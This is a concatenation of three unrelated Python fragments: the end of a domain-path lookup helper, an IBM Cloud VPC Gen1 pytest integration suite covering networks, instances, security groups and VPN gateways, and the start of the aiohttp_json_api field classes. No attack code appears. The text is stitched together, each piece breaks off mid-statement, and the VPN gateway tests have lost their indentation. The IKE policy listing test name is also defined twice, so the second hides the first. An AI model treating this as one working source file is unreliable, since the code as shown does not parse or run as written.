        matches = list(find_domains_from_path(sections, requested_path))
        if len(matches) == 1:
            # exactly one (name, domain) pair claims this root
            return matches[0][1]
        if not matches:
            raise ValueError(f"couldn't find domain at path {requested_path!r}")
        raise ValueError(
            "multiple domains claim root %r: domains %s" %
            (requested_path, ', '.join(repr(x[0]) for x in matches)))
def find_domains_from_path(sections, path):
    """Yield ``(name, domain)`` pairs from *sections* whose root equals *path*."""
    wanted = normpath(abspath(path))
    for name, domain in sections.items():
        root = getattr(domain, 'root', None)
        # skip rootless domains; compare normalized absolute paths otherwise
        if root is not None and normpath(abspath(root)) == wanted:
            yield name, domain
class BooleanQuery(arghparse.DelayedValue):
def __init__(self, attrs, klass_type=None, | |
# test/integration/test_gen1.py
# coding: utf-8
# (C) Copyright IBM Corp. 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_cloud_sdk_core.api_exception import ApiException
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import json
import pytest
import namegenerator
from ibm_vpc.vpc_classic_v1 import *
# Shared dict used to pass created-resource ids between sequentially-run tests.
store = {}
class TestGeography():
    """Region/zone lookups; seeds ``store['region']`` and ``store['zone']``."""
    def test_regions(self, createGen1Service, env):
        regions = list_regions(createGen1Service)
        assert regions.status_code == 200
        region = regions.get_result()['regions'][0]
        store['region'] = region['name']
        # without the env flag, pick the region's first zone immediately
        if not env:
            store['zone'] = region['zones'][0]['name']
    def test_region(self, createGen1Service):
        region = get_region(createGen1Service, store['region'])
        assert region.status_code == 200
    def test_zones(self, createGen1Service, env):
        zones = list_zones(createGen1Service, store['region'])
        assert zones.status_code == 200
        # with the env flag, the zone comes from the zone listing instead
        if env:
            store['zone'] = zones.get_result()['zones'][0]['name']
            print('store[zone]', store['zone'])
    def test_zone(self, createGen1Service):
        zone = get_zone(createGen1Service, store['region'], store['zone'])
        assert zone.status_code == 200
class TestFloatingIPs():
    """Floating-IP CRUD; saves the created id for later NIC-attachment tests."""
    def test_create_floating_ip(self, createGen1Service):
        fip = create_floating_ip(createGen1Service)
        assertCreateResponse(fip)
        store['created_fip_id'] = fip.get_result()['id']
    def test_list_floating_ip(self, createGen1Service):
        fips = list_floating_ips(createGen1Service)
        assertListResponse(fips, 'floating_ips')
    def test_get_floating_ip(self, createGen1Service):
        fip = get_floating_ip(createGen1Service, store['created_fip_id'])
        assertGetPatchResponse(fip)
    def test_update_floating_ip(self, createGen1Service):
        fip = update_floating_ip(createGen1Service, store['created_fip_id'])
        assertGetPatchResponse(fip)
class TestImages():
    """Image and operating-system lookups; private-image cases are skipped."""
    def test_create_images(self, createGen1Service):
        pytest.skip("no cos bucket")
        image = create_image(createGen1Service)
        assertCreateResponse(image)
    def test_list_images(self, createGen1Service):
        images = list_images(createGen1Service)
        assertListResponse(images, 'images')
        # any stock image works for the instance-provisioning tests later
        store['image_id'] = images.get_result()['images'][0]['id']
    def test_get_image(self, createGen1Service):
        image = get_image(createGen1Service, store['image_id'])
        assertGetPatchResponse(image)
    def test_update_image(self, createGen1Service):
        pytest.skip("no private image")
        image = update_image(createGen1Service, store['created_image'])
        assertGetPatchResponse(image)
    def test_delete_image(self, createGen1Service):
        pytest.skip("no private image")
        image = delete_image(createGen1Service, store['created_image'])
        assertDeleteResponse(image)
    def test_list_operating_systems(self, createGen1Service):
        oss = list_operating_systems(createGen1Service, )
        assertListResponse(oss, 'operating_systems')
        store['operating_system_name'] = oss.get_result()['operating_systems'][0]['name']
    def test_get_operating_system(self, createGen1Service):
        # NOTE(review): local name 'os' shadows the os module inside this test
        os = get_operating_system(createGen1Service, store['operating_system_name']).get_result()
        assert os['name'] == store['operating_system_name']
class TestSSHKeys():
    """SSH key CRUD; saves the created key id in ``store``."""
    def test_create_ssh_keys(self, createGen1Service):
        key = create_key(createGen1Service)
        assertCreateResponse(key)
        store['created_key'] = key.get_result()['id']
    def test_list_ssh_keys(self, createGen1Service):
        keys = list_keys(createGen1Service)
        assertListResponse(keys, 'keys')
    def test_get_ssh_key(self, createGen1Service):
        key = get_key(createGen1Service, store['created_key'])
        assertGetPatchResponse(key)
    def test_update_key(self, createGen1Service):
        key = update_key(createGen1Service, store['created_key'])
        assertGetPatchResponse(key)
class TestNetworkACL():
    """Network-ACL and ACL-rule CRUD; ids are chained through ``store``."""
    def test_list_nacl(self, createGen1Service):
        acls = list_network_acls(createGen1Service)
        assertListResponse(acls, 'network_acls')
        store['nacl_id'] = acls.get_result()['network_acls'][0]['id']
    def test_get_nacl(self, createGen1Service):
        acl = get_network_acl(createGen1Service, store['nacl_id'])
        assertGetPatchResponse(acl)
    def test_create_nacl(self, createGen1Service):
        # an existing ACL id is passed in -- presumably used as a source/template
        # by the helper; confirm against its signature
        acl = create_network_acl(createGen1Service, store['nacl_id'])
        assertCreateResponse(acl)
        store['created_nacl_id'] = acl.get_result()['id']
    def test_list_nacl_rules(self, createGen1Service):
        acl_rules = list_network_acl_rules(createGen1Service, store['created_nacl_id'])
        assertListResponse(acl_rules, 'rules')
    def test_create_nacl_rules(self, createGen1Service):
        acl_rule = create_network_acl_rule(createGen1Service, store['created_nacl_id'])
        assertCreateResponse(acl_rule)
        store['created_nacl_rule_id'] = acl_rule.get_result()['id']
    def test_get_nacl_rules(self, createGen1Service):
        acl_rules = get_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
        assertGetPatchResponse(acl_rules)
    def test_update_nacl_rules(self, createGen1Service):
        acl_rule = update_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
        assertGetPatchResponse(acl_rule)
    def test_delete_nacl_rules(self, createGen1Service):
        acl_rule = delete_network_acl_rule(createGen1Service, store['created_nacl_id'], store['created_nacl_rule_id'])
        assertDeleteResponse(acl_rule)
    def test_update_nacl(self, createGen1Service):
        acl = update_network_acl(createGen1Service, store['created_nacl_id'])
        assertGetPatchResponse(acl)
class TestVolume():
    """Volume profile lookups and volume CRUD."""
    def test_list_vol_profiles(self, createGen1Service):
        profiles = list_volume_profiles(createGen1Service)
        assertListResponse(profiles, 'profiles')
        store['vol_profile'] = profiles.get_result()['profiles'][0]['name']
    def test_get_vol_profile(self, createGen1Service):
        vol = get_volume_profile(createGen1Service, store['vol_profile'])
        response = vol.get_result()
        assert vol.status_code == 200
        assert response['name'] is not None
    def test_create_volume(self, createGen1Service):
        # requires store['zone'] seeded by the geography/subnet tests
        vol = create_volume(createGen1Service, store['zone'])
        assertCreateResponse(vol)
        store['created_vol'] = vol.get_result()['id']
    def test_list_vols(self, createGen1Service):
        vols = list_volumes(createGen1Service)
        assertListResponse(vols, 'volumes')
    def test_get_vol(self, createGen1Service):
        vol = get_volume(createGen1Service, store['created_vol'])
        assertGetPatchResponse(vol)
    def test_update_vol(self, createGen1Service):
        vol = update_volume(createGen1Service, store['created_vol'])
        assertGetPatchResponse(vol)
class TestVPC():
    """VPC CRUD; saves the created VPC id for subnet/gateway/instance tests."""
    def test_list_vpc(self, createGen1Service):
        vpcs = list_vpcs(createGen1Service)
        assertListResponse(vpcs, 'vpcs')
    def test_create_vpc(self, createGen1Service):
        vpc = create_vpc(createGen1Service)
        assertCreateResponse(vpc)
        store['created_vpc'] = vpc.get_result()['id']
        print('created_vpc: ' + store['created_vpc'])
    def test_get_vpc(self, createGen1Service):
        vpc = get_vpc(createGen1Service, store['created_vpc'])
        assertGetPatchResponse(vpc)
    def test_update_vpc(self, createGen1Service):
        vpc = update_vpc(createGen1Service, store['created_vpc'])
        assertGetPatchResponse(vpc)
class TestSubnet():
    """Subnet CRUD plus subnet<->network-ACL association."""
    def test_list_subnet(self, createGen1Service):
        subnets = list_subnets(createGen1Service)
        assertListResponse(subnets, 'subnets')
        subnet = subnets.get_result()['subnets'][0]
        # store['subnet_id'] = subnet['id']
        store['vpc_id'] = subnet['vpc']['id']
        # overwrite the zone with one an existing subnet actually lives in
        store['zone'] = subnet['zone']['name']
    def test_create_subnet(self, createGen1Service):
        print(store['zone'], store['created_vpc'])
        subnet = create_subnet(createGen1Service, store['created_vpc'], store['zone'])
        assertCreateResponse(subnet)
        store['created_subnet'] = subnet.get_result()['id']
        print('created_subnet: ' + store['created_subnet'])
    def test_get_subnet(self, createGen1Service):
        subnet = get_subnet(createGen1Service, store['created_subnet'])
        assertGetPatchResponse(subnet)
    def test_update_subnet(self, createGen1Service):
        subnet = update_subnet(createGen1Service, store['created_subnet'])
        assertGetPatchResponse(subnet)
    def test_update_subnet_nacl(self, createGen1Service):
        # attaches the ACL created by TestNetworkACL to the new subnet
        subnet_nacl = replace_subnet_network_acl(createGen1Service, store['created_subnet'], store['created_nacl_id'])
        assertCreateResponse(subnet_nacl)
    def test_get_subnet_nacl(self, createGen1Service):
        subnet_nacl = get_subnet_network_acl(createGen1Service, store['created_subnet'])
        assertGetPatchResponse(subnet_nacl)
class TestPublicGateways():
    """Public-gateway CRUD plus subnet attachment/detachment."""
    def test_create_pgw(self, createGen1Service):
        print(store['zone'])
        pgw = create_public_gateway(createGen1Service, store['created_vpc'], store['zone'])
        assertCreateResponse(pgw)
        store['created_pgw'] = pgw.get_result()['id']
    def test_list_pgws(self, createGen1Service):
        pgws = list_public_gateways(createGen1Service)
        assertListResponse(pgws, 'public_gateways')
    def test_get_pgw(self, createGen1Service):
        pgw = get_public_gateway(createGen1Service, store['created_pgw'])
        assertGetPatchResponse(pgw)
    def test_update_pgw(self, createGen1Service):
        pgw = update_public_gateway(createGen1Service, store['created_pgw'])
        assertGetPatchResponse(pgw)
    def test_update_subnet_pgw(self, createGen1Service):
        subnet = set_subnet_public_gateway(createGen1Service, store['created_subnet'], store['created_pgw'])
        assertCreateResponse(subnet)
    def test_get_subnet_pgw(self, createGen1Service):
        subnet = get_subnet_public_gateway(createGen1Service, store['created_subnet'])
        assertGetPatchResponse(subnet)
    def test_delete_subnet_pgw(self, createGen1Service):
        vpc = unset_subnet_public_gateway(createGen1Service, store['created_subnet'])
        assertDeleteResponse(vpc)
class TestInstances():
    """Lifecycle tests for VPC instances and their sub-resources
    (network interfaces, floating IPs, volume attachments)."""

    def test_list_instances(self, createGen1Service):
        """List instances; remember one instance id and its primary NIC."""
        response = list_instances(createGen1Service)
        assertListResponse(response, 'instances')
        first = response.get_result()['instances'][0]
        store['instance_id'] = first['id']
        store['network_interface_id'] = first['primary_network_interface']['id']

    def test_list_instance_profiles(self, createGen1Service):
        """List instance profiles; remember one profile name for later."""
        response = list_instance_profiles(createGen1Service)
        assertListResponse(response, 'profiles')
        store['instance_profile'] = response.get_result()['profiles'][0]['name']

    def test_get_instance_profile(self, createGen1Service):
        """Fetch the remembered instance profile."""
        response = get_instance_profile(createGen1Service, store['instance_profile'])
        assert response.status_code == 200
        assert response.get_result() is not None

    def test_create_instance(self, createGen1Service):
        """Create an instance in the prepared VPC/subnet; remember its id."""
        response = create_instance(createGen1Service, store['created_vpc'],
                                   store['instance_profile'], store['zone'],
                                   store['image_id'], store['created_subnet'])
        assertCreateResponse(response)
        store['created_instance_id'] = response.get_result()['id']
        print('created_instance_id -' + store['created_instance_id'])

    def test_get_instance(self, createGen1Service):
        """Fetch the created instance."""
        response = get_instance(createGen1Service, store['created_instance_id'])
        assertGetPatchResponse(response)

    def test_update_instance(self, createGen1Service):
        """Patch the created instance."""
        response = update_instance(createGen1Service, store['created_instance_id'])
        assertGetPatchResponse(response)

    def test_create_instance_action(self, createGen1Service):
        """Invoke an action on the created instance."""
        response = create_instance_action(createGen1Service, store['created_instance_id'])
        assert response.status_code == 201
        assert response.get_result()['id'] is not None

    def test_get_instance_initialization(self, createGen1Service):
        """Read the created instance's initialization details."""
        response = get_instance_initialization(createGen1Service, store['created_instance_id'])
        assert response.status_code == 200
        assert response.get_result() is not None

    def test_list_instance_network_interfaces(self, createGen1Service):
        """List the instance's NICs; remember the first NIC id."""
        response = list_instance_network_interfaces(createGen1Service, store['created_instance_id'])
        assertListResponse(response, 'network_interfaces')
        store['nic_id'] = response.get_result()['network_interfaces'][0]['id']

    def test_get_instance_network_interface(self, createGen1Service):
        """Fetch one NIC of the created instance."""
        response = get_instance_network_interface(createGen1Service, store['created_instance_id'], store['nic_id'])
        assertGetPatchResponse(response)

    def test_create_instance_nic_fip(self, createGen1Service):
        """Associate the prepared floating IP with the instance NIC."""
        response = add_instance_network_interface_floating_ip(
            createGen1Service, store['created_instance_id'],
            store['nic_id'], store['created_fip_id'])
        assertCreateResponse(response)
        store['created_nic_fip'] = response.get_result()['id']

    def test_get_instance_nic_fips(self, createGen1Service):
        """List floating IPs attached to the instance NIC."""
        response = list_instance_network_interface_floating_ips(
            createGen1Service, store['created_instance_id'], store['nic_id'])
        assertListResponse(response, 'floating_ips')

    def test_get_instance_nic_fip(self, createGen1Service):
        """Fetch one floating IP attached to the instance NIC."""
        response = get_instance_network_interface_floating_ip(
            createGen1Service, store['created_instance_id'], store['nic_id'], store['created_fip_id'])
        assertGetPatchResponse(response)

    def test_delete_instance_nic_fip(self, createGen1Service):
        """Dissociate the floating IP from the instance NIC."""
        response = remove_instance_network_interface_floating_ip(
            createGen1Service, store['created_instance_id'], store['nic_id'], store['created_fip_id'])
        assertDeleteResponse(response)

    def test_create_instance_vol_attachment(self, createGen1Service):
        """Attach the prepared volume to the instance; remember the id."""
        response = create_instance_volume_attachment(
            createGen1Service, store['created_instance_id'], store['created_vol'])
        assertCreateResponse(response)
        store['created_vol_atchmt'] = response.get_result()['id']

    def test_list_instance_vol_attachment(self, createGen1Service):
        """List the instance's volume attachments."""
        response = list_instance_volume_attachments(createGen1Service, store['created_instance_id'])
        assertListResponse(response, 'volume_attachments')

    def test_get_instance_vol_attachment(self, createGen1Service):
        """Fetch the created volume attachment."""
        response = get_instance_volume_attachment(
            createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
        assertGetPatchResponse(response)

    def test_update_instance_vol_attachment(self, createGen1Service):
        """Patch the created volume attachment."""
        response = update_instance_volume_attachment(
            createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
        assertGetPatchResponse(response)

    def test_delete_instance_vol_attachment(self, createGen1Service):
        """Detach the volume from the instance."""
        response = delete_instance_volume_attachment(
            createGen1Service, store['created_instance_id'], store['created_vol_atchmt'])
        assertDeleteResponse(response)

    def test_delete_instance(self, createGen1Service):
        """Delete the created instance."""
        response = delete_instance(createGen1Service, store['created_instance_id'])
        assertDeleteResponse(response)
class TestSecurityGroups():
    """Lifecycle tests for security groups, their NIC memberships and rules."""

    def test_create_sg(self, createGen1Service):
        """Create a security group in the created VPC; remember its id."""
        response = create_security_group(createGen1Service, store['created_vpc'])
        assertCreateResponse(response)
        store['created_sg_id'] = response.get_result()['id']

    def test_list_sgs(self, createGen1Service):
        """List security groups."""
        response = list_security_groups(createGen1Service)
        assertListResponse(response, 'security_groups')

    def test_get_sg(self, createGen1Service):
        """Fetch the created security group."""
        response = get_security_group(createGen1Service, store['created_sg_id'])
        assertGetPatchResponse(response)

    def test_update_sg_network_interface(self, createGen1Service):
        """Add the remembered NIC to the security group; remember the id."""
        response = add_security_group_network_interface(
            createGen1Service, store['created_sg_id'], store['network_interface_id'])
        assertCreateResponse(response)
        store['created_sg_network_interface_id'] = response.get_result()['id']

    def test_list_sg_network_interface(self, createGen1Service):
        """List NICs belonging to the security group."""
        response = list_security_group_network_interfaces(createGen1Service, store['created_sg_id'])
        assert response.status_code == 200

    def test_get_sg_network_interface(self, createGen1Service):
        """Fetch one NIC belonging to the security group."""
        response = get_security_group_network_interface(
            createGen1Service, store['created_sg_id'], store['created_sg_network_interface_id'])
        assertGetPatchResponse(response)

    def test_delete_sg_network_interface(self, createGen1Service):
        """Remove the NIC from the security group."""
        response = remove_security_group_network_interface(
            createGen1Service, store['created_sg_id'], store['created_sg_network_interface_id'])
        assertDeleteResponse(response)

    def test_create_sg_rule(self, createGen1Service):
        """Create a rule in the security group; remember its id."""
        response = create_security_group_rule(createGen1Service, store['created_sg_id'])
        assertCreateResponse(response)
        store['created_sg_rule_id'] = response.get_result()['id']

    def test_list_sg_rules(self, createGen1Service):
        """List rules of the security group."""
        response = list_security_group_rules(createGen1Service, store['created_sg_id'])
        assertListResponse(response, 'rules')

    def test_get_sg_rule(self, createGen1Service):
        """Fetch the created security group rule."""
        response = get_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
        assertGetPatchResponse(response)

    def test_update_sg_rule(self, createGen1Service):
        """Patch the created security group rule."""
        response = update_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
        assertGetPatchResponse(response)

    def test_delete_sg_rule(self, createGen1Service):
        """Delete the created security group rule."""
        response = delete_security_group_rule(createGen1Service, store['created_sg_id'], store['created_sg_rule_id'])
        assertDeleteResponse(response)

    def test_update_sg(self, createGen1Service):
        """Patch the created security group."""
        response = update_security_group(createGen1Service, store['created_sg_id'])
        assertGetPatchResponse(response)

    def test_delete_sg(self, createGen1Service):
        """Delete the created security group."""
        response = delete_security_group(createGen1Service, store['created_sg_id'])
        assertDeleteResponse(response)
class TestVPCDefaultSecurityGroup():
    """Read-only check of a VPC's default security group."""

    def test_get_sg_network_interface(self, createGen1Service):
        """Fetch the default security group of the created VPC."""
        response = get_vpc_default_security_group(createGen1Service, store['created_vpc'])
        assertGetPatchResponse(response)
class TestVPCRoutes():
    """Lifecycle tests for VPC routes (most are skipped: environment missing)."""

    def test_create_route(self, createGen1Service):
        """Create a route in the created VPC (skipped: no environment)."""
        pytest.skip("No env")
        response = create_vpc_route(createGen1Service, store['created_vpc'], store['zone'])
        assertCreateResponse(response)
        store['created_route'] = response.get_result()['id']

    def test_list_routes(self, createGen1Service):
        """List routes of the created VPC."""
        response = list_vpc_routes(createGen1Service, store['created_vpc'])
        assertListResponse(response, 'routes')

    def test_get_route(self, createGen1Service):
        """Fetch the created route (skipped: no environment)."""
        pytest.skip("No env")
        response = get_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
        assertGetPatchResponse(response)

    def test_update_route(self, createGen1Service):
        """Patch the created route (skipped: no environment)."""
        pytest.skip("No env")
        response = update_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
        assertGetPatchResponse(response)

    def test_delete_route(self, createGen1Service):
        """Delete the created route (skipped: no environment)."""
        pytest.skip("No env")
        response = delete_vpc_route(createGen1Service, store['created_vpc'], store['created_route'])
        assertDeleteResponse(response)
class TestAddressPrefix():
    """Lifecycle tests for VPC address prefixes."""

    def test_create_address_prefix(self, createGen1Service):
        """Create an address prefix in the created VPC; remember its id."""
        response = create_vpc_address_prefix(createGen1Service, store['created_vpc'], store['zone'])
        assertCreateResponse(response)
        store['created_address_prefix'] = response.get_result()['id']

    def test_list_address_prefixes(self, createGen1Service):
        """List address prefixes of the created VPC."""
        response = list_vpc_address_prefixes(createGen1Service, store['created_vpc'])
        assertListResponse(response, 'address_prefixes')

    def test_get_address_prefix(self, createGen1Service):
        """Fetch the created address prefix."""
        response = get_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
        assertGetPatchResponse(response)

    def test_update_address_prefix(self, createGen1Service):
        """Patch the created address prefix."""
        response = update_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
        assertGetPatchResponse(response)

    def test_delete_address_prefix(self, createGen1Service):
        """Delete the created address prefix."""
        response = delete_vpc_address_prefix(createGen1Service, store['created_vpc'], store['created_address_prefix'])
        assertDeleteResponse(response)
class TestVPNGateways():
def test_create_ike_policy(self, createGen1Service):
ike_policy = create_ike_policy(createGen1Service)
assertCreateResponse(ike_policy)
store['created_ike_policy_id'] = ike_policy.get_result()['id']
def test_list_ike_policies(self, createGen1Service):
ike_policies = list_ike_policies(createGen1Service)
assertListResponse(ike_policies, 'ike_policies')
def test_get_ike_policy(self, createGen1Service):
ike_policy = get_ike_policy(createGen1Service, store['created_ike_policy_id'])
assertGetPatchResponse(ike_policy)
def test_update_ike_policy(self, createGen1Service):
ike_policy = update_ike_policy(createGen1Service, store['created_ike_policy_id'])
assertGetPatchResponse(ike_policy)
def test_list_ike_policy_connections(self, createGen1Service):
ike_policies_conn = list_ike_policy_connections(createGen1Service, store['created_ike_policy_id'])
assertListResponse(ike_policies_conn, 'connections')
def test_create_ipsec_policy(self, createGen1Service):
ipsec_policy = create_ipsec_policy(createGen1Service)
assertCreateResponse(ipsec_policy)
store['created_ipsec_policy_id'] = ipsec_policy.get_result()['id']
def test_list_ike_policies(self, createGen1Service):
ipsec_policies = list_ipsec_policies(createGen1Service)
assertListResponse(ipsec_policies, 'ipsec_policies')
def test_get_ipsec_policy(self, createGen1Service):
ipsec_policy = get_ipsec_policy(createGen1Service, store['created_ipsec_policy_id'])
assertGetPatchResponse(ipsec_policy)
def test_update_ipsec_policy(self, createGen1Service):
ipsec_policy = update_ipsec_policy(createGen1Service, store['created_ipsec_policy_id'])
assertGetPatchResponse(ipsec_policy)
def test_list_ipsec_policy_connections(self, createGen1Service):
ipsec_policies_conn = list_ipsec_policy_connections(createGen1Service, store['created_ipsec_policy_id'])
assertListResponse(ipsec_policies_conn, 'connections')
# vpn_gateways
def test_create_vpn_gateway(self, createGen1Service):
vpn_gateway = create_vpn_gateway(createGen1Service, store['created_subnet'])
assertCreateResponse(vpn_gateway)
store['created_vpn_gateway_id'] = vpn_gateway.get_result()['id']
def test_list_vpn_gateways(self, createGen1Service):
ipsec_policies = list_vpn_gateways(createGen1Service)
assertListResponse(ipsec_policies, 'vpn_gateways')
def test_get_vpn_gateway(self, createGen1Service):
vpn_gateway = get_vpn_gateway(createGen1Service, store['created_vpn_gateway_id'])
assertGetPatchResponse(vpn_gateway)
def test_update_vpn_gateway(self, createGen1Service):
vpn_gateway = update_vpn_gateway(createGen1Service, store['created_vpn_gateway_id'])
assertGetPatchResponse(vpn_gateway)
# vpn_gateways_connections
def test_create_vpn_gateway_connections(self, createGen1Service):
vpn_gateway_connection = create_vpn_gateway_connection(createGen1Service, store['created_vpn_gateway_id'])
assertCreateResponse(vpn_gateway_connection)
store['created_vpn_gateway_connection_id'] = vpn_gateway_connection.get_result()['id']
def test_list_vpn_gateway_connections(self, createGen1Service):
vpn_gateway_connections = list_vpn_gateway_connections(createGen1Service, store['created_vpn_gateway_id'])
assertListResponse(vpn_gateway_connections, 'connections')
def test_get_vpn_gateway_connection(self, createGen1Service):
vpn_gateway_connection = get_vpn_gateway_connection(createGen1Service, store['created_vpn_gateway_id'], store['created_vpn_gateway_connection_id'])
assertGetPatchResponse(vpn_gateway_connection)
def test_update_vpn_gateway_connection(self, createGen1Service):
vpn_gateway_connection = | |
"""
Fields
======
.. note::
    Always remember that you can model the JSON API completely with the fields
    in :mod:`~aiohttp_json_api.schema.base_fields`.
.. sidebar:: Index
* :class:`String`
* :class:`Integer`
* :class:`Float`
* :class:`Complex`
* :class:`Decimal`
* :class:`Fraction`
* :class:`DateTime`
* :class:`TimeDelta`
* :class:`UUID`
* :class:`Boolean`
* :class:`URI`
* :class:`Email`
* :class:`Dict`
* :class:`List`
* :class:`Number`
* :class:`Str`
* :class:`Bool`
This module contains fields for several standard Python types and classes
from the standard library.
"""
import collections
import collections.abc
import datetime
import fractions
import uuid
from enum import Enum
import trafaret as t
from trafaret.contrib import rfc_3339
from yarl import URL
from .base import Attribute
from .trafarets import DecimalTrafaret
from ..errors import InvalidType, InvalidValue
from ..helpers import is_collection
# Names exported via ``from ...fields import *``.
# NOTE(review): class ``Date`` (defined below) is not listed here -- confirm
# whether its exclusion from the public API is intentional.
__all__ = [
    "String",
    "Integer",
    "Float",
    "Complex",
    "Decimal",
    "Fraction",
    "DateTime",
    "TimeDelta",
    "UUID",
    "Boolean",
    "URI",
    "Email",
    "Dict",
    "List",
    "Number",
    "Str",
    "Bool"
]
class String(Attribute):
    """
    An attribute validated as a string via ``trafaret``.

    :arg bool allow_blank: Accept the empty string.
    :arg regex: If given, validate with ``t.Regexp(regex)`` instead of
        ``t.String`` (``allow_blank``/``min_length``/``max_length`` are then
        ignored).
    :arg choices: A collection of allowed values, or an :class:`~enum.Enum`
        subclass whose *member names* are the allowed values.
    :arg min_length: Minimum accepted string length.
    :arg max_length: Maximum accepted string length.
    """

    def __init__(self, *, allow_blank=False, regex=None, choices=None,
                 min_length=None, max_length=None, **kwargs):
        super(String, self).__init__(**kwargs)
        if regex is not None:
            self._trafaret = t.Regexp(regex)
        else:
            self._trafaret = t.String(allow_blank=allow_blank,
                                      min_length=min_length,
                                      max_length=max_length)
        self.choices = None
        if choices and is_collection(choices):
            if isinstance(choices, type(Enum)):
                self.choices = choices
                self._trafaret &= t.Enum(*choices.__members__.keys())
            else:
                self._trafaret &= t.Enum(*choices)
        if self.allow_none:
            self._trafaret |= t.Null()

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            detail = error.as_dict()
            if self.choices is not None:
                # BUG FIX: ``error.as_dict()`` may return a dict (nested
                # errors); the original ``detail += ' (...)'`` then raised
                # TypeError instead of the intended InvalidValue.  Formatting
                # works for both str and dict details and produces the same
                # text as before for the string case.
                detail = '{} ({})'.format(
                    detail, ', '.join(self.choices.__members__.keys())
                )
            raise InvalidValue(detail=detail, source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        # When choices is an Enum class and the value names a member,
        # return the member itself; otherwise pass the raw value through.
        return self.choices[data] \
            if isinstance(self.choices, type(Enum)) and \
            data in self.choices.__members__ \
            else data

    def serialize(self, schema, data, **kwargs):
        # Enum members are serialized by name.
        if isinstance(data, Enum):
            result = self._trafaret.check(data.name)
        else:
            result = self._trafaret.check(data)
        return result
class Integer(Attribute):
    """An attribute validated as an integer (optionally bounded) via
    ``trafaret``; ``None`` is accepted when ``allow_none`` is set."""

    def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
        super(Integer, self).__init__(**kwargs)
        checker = t.Int(gte=gte, lte=lte, gt=gt, lt=lt)
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidValue(detail=error.as_dict(), source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        return self._trafaret.check(data)

    def serialize(self, schema, data, **kwargs):
        return self._trafaret.check(data)
class Float(Attribute):
    """An attribute validated as a float (optionally bounded) via
    ``trafaret``; ``None`` is accepted when ``allow_none`` is set."""

    def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
        super(Float, self).__init__(**kwargs)
        checker = t.Float(gte=gte, lte=lte, gt=gt, lt=lt)
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidValue(detail=error.as_dict(), source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        return self._trafaret.check(data)

    def serialize(self, schema, data, **kwargs):
        return self._trafaret.check(data)
class Complex(Attribute):
    """
    Encodes a :class:`complex` number as JSON object with a *real* and *imag*
    member::
        {"real": 1.2, "imag": 42}
    """

    def pre_validate(self, schema, data, sp):
        detail = "Must be an object with a 'real' and 'imag' member.'"
        # BUG FIX: ``collections.Mapping`` was removed in Python 3.10; the
        # ABC lives in ``collections.abc``.
        if not isinstance(data, collections.abc.Mapping):
            raise InvalidType(detail=detail, source_pointer=sp)
        if "real" not in data:
            detail = "Does not have a 'real' member."
            raise InvalidValue(detail=detail, source_pointer=sp)
        if "imag" not in data:
            detail = "Does not have an 'imag' member."
            raise InvalidValue(detail=detail, source_pointer=sp)
        if not isinstance(data["real"], (int, float)):
            detail = "The real part must be a number."
            raise InvalidValue(detail=detail, source_pointer=sp / "real")
        if not isinstance(data["imag"], (int, float)):
            detail = "The imaginar part must be a number."
            raise InvalidValue(detail=detail, source_pointer=sp / "imag")

    def deserialize(self, schema, data, sp, **kwargs):
        # pre_validate guarantees both members are numbers.
        return complex(data["real"], data["imag"])

    def serialize(self, schema, data, **kwargs):
        # Accept anything convertible to complex (int, float, complex).
        data = complex(data)
        return {"real": data.real, "imag": data.imag}
class Decimal(Attribute):
    """Encodes and decodes a :class:`decimal.Decimal` as a string."""

    def __init__(self, *, gte=None, lte=None, gt=None, lt=None, **kwargs):
        super(Decimal, self).__init__(**kwargs)
        checker = DecimalTrafaret(gte=gte, lte=lte, gt=gt, lt=lt)
        if self.allow_none:
            checker |= t.Null()
        self._trafaret = checker

    def pre_validate(self, schema, data, sp):
        try:
            self._trafaret.check(data)
        except t.DataError as error:
            raise InvalidValue(detail=error.as_dict(), source_pointer=sp)

    def deserialize(self, schema, data, sp, **kwargs):
        # ``None`` passes through untouched when permitted.
        if self.allow_none and data is None:
            return None
        return self._trafaret.check(data)

    def serialize(self, schema, data, **kwargs):
        if self.allow_none and data is None:
            return None
        # Serialized form is the decimal's string representation.
        return str(self._trafaret.check(data))
class Fraction(Attribute):
    """Stores a :class:`fractions.Fraction` in an object with a *numerator*
    and *denominator* member::
        # 2/3
        {"numerator": 2, "denominator": 3}
    :arg float min:
        The fraction must be greater or equal than this value.
    :arg float max:
        The fraction must be less or equal than this value.
    """
    def __init__(self, *, min=None, max=None, **kwargs):
        super(Fraction, self).__init__(**kwargs)
        # min must be <= max
        assert min is None or max is None or min <= max
        self.min = min
        self.max = max
    def pre_validate(self, schema, data, sp):
        if not isinstance(data, dict):
